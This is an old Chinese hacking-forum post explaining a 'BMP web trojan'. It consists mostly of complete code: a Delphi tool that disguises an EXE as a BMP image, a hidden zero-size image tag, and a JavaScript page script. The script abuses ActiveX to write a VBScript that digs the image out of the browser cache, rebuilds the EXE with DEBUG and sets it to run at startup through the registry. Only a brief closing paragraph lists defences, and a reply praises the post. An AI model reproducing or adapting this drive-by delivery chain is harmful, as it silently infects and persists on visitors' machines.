找回密码
 注册

QQ登录

只需一步,快速开始

查看: 2815|回复: 1

图片木马全解析

鞠中山  | 发表于 2005-8-23 06:09:45 | 显示全部楼层 |阅读模式 来自 中国山东潍坊

马上注册,结交更多好友,享用更多功能。

您需要 登录 才可以下载或查看,没有帐号?注册

x
<>何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行. </P>
<>然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了. </P>
<>看上去好象很复杂,下面我们一步一步来: <BR>1) EXE变BMP的方法. <BR>大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下: </P>
<P>program exe2bmp; </P>
<P>uses <BR>Windows, <BR>SysUtils; </P>
<P>var len,row,col,fs: DWORD; <BR>buffer: array[0..255]of char; <BR>fd: WIN32_FIND_DATA; <BR>h,hw: THandle; </P>
<P>begin <BR>if (ParamStr(1)&lt;&gt;'') and(ParamStr(2)&lt;&gt;'') then begin //如果运行后没有两个参数则退出 <BR>if FileExists(ParamStr(1)) then begin <BR>FindFirstFile(Pchar(ParamStr(1)),fd); <BR>fs:=fd.nFileSizeLow; <BR>col := 4; <BR>while true do begin <BR>if (fs mod 12)=0 then begin <BR>len:=fs; <BR>end else len:=fs+12-(fs mod 12); <BR>row := len div col div 3; <BR>if row&gt;col then begin <BR>col:=col+4; <BR>end else Break; <BR>end; <BR>FillChar(buffer,256,0); <BR>{一下为BMP文件头数据} <BR>Buffer[0]:='B';Buffer[1]:='M'; <BR>PDWORD(@buffer[18])^:=col; <BR>PDWORD(@buffer[22])^:=row; <BR>PDWORD(@buffer[34])^:=len; <BR>PDWORD(@buffer[2])^:=len+54; <BR>PDWORD(@buffer[10])^:=54; <BR>PDWORD(@buffer[14])^:=40; <BR>PWORD(@buffer[26])^:=1; <BR>PWORD(@buffer[28])^:=24; <BR>{写入文件} <BR>hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0); <BR>h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0); <BR>WriteFile(hw,buffer,54,col,0); <BR>repeat <BR>ReadFile(h,buffer,256,col,0); <BR>WriteFile(hw,buffer,col,col,0); <BR>untilcol&lt;&gt;256; <BR>WriteFile(hw,buffer,len-fs,col,0); <BR>CloseHandle(h); <BR>CloseHandle(hw); <BR>end; <BR>end; <BR>end. </P>
<P><BR>以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入 <BR>exe2bmp myexe.exe mybmp.bmp <BR>回车就可以把第二个参数所指定的EXE文件转换成BMP格式. <BR>接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式 <BR>&lt;img srd="mybmp.bmp" higth="0" width="0"&gt; </P>
<P><BR>以下是放在网页上的脚本 <BR>document.write(' '); <BR>function docsave() <BR>{ <BR>a=document.applets[0]; <BR>a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); <BR>a.createInstance(); <BR>wsh=a.GetObject(); <BR>a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}'); <BR>a.createInstance(); <BR>fso=a.GetObject(); <BR>var winsys=fso.GetSpecialFolder(1); <BR>var vbs=winsys+'\\s.vbs'; <BR>wsh.RegWrite <BR>('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'" '); <BR>var st=fso.CreateTextFile(vbs,true); <BR>st.WriteLine('Option Explicit'); <BR>st.WriteLine('Dim FSO,WSH,CACHE,str'); <BR>st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")'); <BR>st.WriteLine('Set WSH = CreateObject("WScript.Shell")'); <BR>st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'); <BR>st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")'); <BR>st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"'); <BR>st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"'); <BR>st.WriteLine('WScript.Quit()'); <BR>st.WriteLine('Function SearchBMPFile(Folder,fname)'); <BR>st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys'); <BR>st.WriteLine(' str=FSO.GetParentFolderName(folder) &amp; "\\" &amp; folder.name &amp; "\\" &amp; fname'); <BR>st.WriteLine(' if FSO.FileExists(str) then'); <BR>st.WriteLine(' tmp=fso.GetSpecialFolder(2) &amp; "<a>\\"'</A>); <BR>st.WriteLine(' winsys=fso.GetSpecialFolder(1) &amp; "<a>\\"'</A>); <BR>st.WriteLine(' set File=FSO.GetFile(str)'); <BR>st.WriteLine(' File.Copy(tmp &amp; "tmp.dat")'); <BR>st.WriteLine(' File.Delete'); <BR>st.WriteLine(' set Lt=FSO.CreateTextFile(tmp &amp; "tmp.in")'); <BR>st.WriteLine(' Lt.WriteLine("rbx")'); <BR>st.WriteLine(' Lt.WriteLine("0")'); <BR>st.WriteLine(' Lt.WriteLine("rcx")'); <BR>st.WriteLine(' Lt.WriteLine("1000")'); <BR>st.WriteLine(' Lt.WriteLine("w136")'); <BR>st.WriteLine(' Lt.WriteLine("q")'); <BR>st.WriteLine(' Lt.Close'); <BR>st.WriteLine(' WSH.Run "command /c debug " &amp; tmp &amp; "tmp.dat &lt;" &amp; tmp &amp; "tmp.in &gt;" &amp; tmp &amp; "tmp.out",false,6'); <BR>st.WriteLine(' On Error Resume Next '); <BR>st.WriteLine(' FSO.GetFile(tmp &amp; "tmp.dat").Copy(winsys &amp; "tmp.exe")'); <BR>st.WriteLine(' FSO.GetFile(tmp &amp; "tmp.dat").Delete'); <BR>st.WriteLine(' FSO.GetFile(tmp &amp; "tmp.in").Delete'); <BR>st.WriteLine(' FSO.GetFile(tmp &amp; "tmp.out").Delete'); <BR>st.WriteLine(' end if'); <BR>st.WriteLine(' If Folder.SubFolders.Count &lt;&gt; 0 Then'); <BR>st.WriteLine(' For Each SubFolder In Folder.SubFolders'); <BR>st.WriteLine(' SearchBMPFile SubFolder,fname'); <BR>st.WriteLine(' Next'); <BR>st.WriteLine(' End If'); <BR>st.WriteLine('End Function'); <BR>st.Close(); <BR>} <BR>setTimeout('docsave()',1000); </P>
<P>把该脚本保存为"js.js",在网页中插入: <BR>&lt;script src="js.js"&gt;&lt;/script&gt; </P>
<P>该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。 <BR>“S.VBS”文件主要内容如下: </P>
<P>Option Explicit <BR>Dim FSO,WSH,CACHE,str <BR>Set FSO = CreateObject("Scripting.FileSystemObject") <BR>Set WSH = CreateObject("WScript.Shell") <BR>CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache") <BR>wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs") <BR>wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe" <BR>SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp" <BR>WScript.Quit() <BR>Function SearchBMPFile(Folder,fname) <BR>Dim SubFolder,File,Lt,tmp,winsys <BR>'从临时文件夹中查找目标BMP图片 <BR>str=FSO.GetParentFolderName(folder) &amp; "\" &amp; folder.name &amp; "\" &amp; fname <BR>if FSO.FileExists(str) then <BR>tmp=fso.GetSpecialFolder(2) &amp; "\" <BR>winsys=fso.GetSpecialFolder(1) &amp; "\" <BR>set File=FSO.GetFile(str) <BR>File.Copy(tmp &amp; "tmp.dat") <BR>File.Delete <BR>'生成一个DEBUG脚本 <BR>set Lt=FSO.CreateTextFile(tmp &amp; "tmp.in") <BR>Lt.WriteLine("rbx") <BR>Lt.WriteLine("0") <BR>Lt.WriteLine("rcx") <BR>'下面一行的1000是十六进制,换回十进制是4096(该数字是你的EXE文件的大小) <BR>Lt.WriteLine("1000") <BR>Lt.WriteLine("w136") <BR>Lt.WriteLine("q") <BR>Lt.Close <BR>WSH.Run "command /c debug " &amp; tmp &amp; "tmp.dat &lt;" &amp; tmp &amp;"tmp.in&gt;" &amp; tmp &amp; "tmp.out",false,6 <BR>On Error Resume Next <BR>FSO.GetFile(tmp &amp; "tmp.dat").Copy(winsys &amp; "tmp.exe") <BR>FSO.GetFile(tmp &amp; "tmp.dat").Delete <BR>FSO.GetFile(tmp &amp; "tmp.in").Delete <BR>FSO.GetFile(tmp &amp; "tmp.out").Delete <BR>end if <BR>If Folder.SubFolders.Count &lt;&gt; 0 Then <BR>For Each SubFolder In Folder.SubFolders <BR>SearchBMPFile SubFolder,fname <BR>Next <BR>End If <BR>End Function </P>
<P>防范方法: <BR>最简单,删除或改名wscrpit.exe文件和DEBUG 文件; <BR>安装有效的杀毒软件,因为这些脚本有好多杀毒软件已经可以查出来了. <BR>在条件允许的情况下,安装WIN2K SP3,尽量避免去一些不名来历的网站. <BR></P>
hefeng8012 发表于 2005-8-23 13:23:26 | 显示全部楼层 来自 中国山东青岛
<>很经典!</P>
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表